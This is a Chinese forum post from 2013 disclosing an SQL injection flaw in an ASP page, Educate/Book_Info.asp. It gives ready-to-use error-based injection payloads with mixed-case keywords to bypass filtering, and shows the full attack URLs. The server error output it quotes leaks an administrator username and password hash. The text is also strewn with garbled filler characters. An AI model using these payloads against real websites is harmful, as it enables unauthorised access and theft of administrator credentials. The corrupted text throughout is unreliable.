漏洞出现在Educate/Book_Info.asp
' g7 e2 ^* Q5 @. \+ w5 F : z. h- U w4 A0 v
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# ~) q* H& R: a* [
4 } o. g* `# Z" h3 k# c
exp:如下
) h$ m2 Y; M9 K: Q2 z查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) O; ?* ?! T7 X+ p# Q9 D1 x查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
2 b5 I/ g6 Q0 p" }6 |
2 R. ?: L' z }0 h4 l. whttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 i) J# Z/ V, G! N. w6 B
4 z4 k) m9 ?- @
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 V D& P0 p, m; D* u) t
, E4 g* h( q2 d3 `4 K0 W: d. Z6 l% j将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% V0 ]$ E. v9 [3 n
. G7 k- Z0 ]4 x3 q" R+ }
/Educate/Book_Info.asp,行 8- m7 p" H: U0 `, ?) ?
6 j5 Z2 \1 g$ J% W2 f: ^http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
R. g, h- X8 o* N
) }. P1 O6 m- r0 sMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'; k( Y2 d% w1 m9 U
3 r$ O8 h# |; Y$ D
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
* D9 A1 L0 H' I- w2 q $ ]! D# h$ B% V
/Educate/Book_Info.asp,行 8- n5 a! q5 @, f" w
|
发表于 2013-2-16 21:44:16
收藏
支持
反对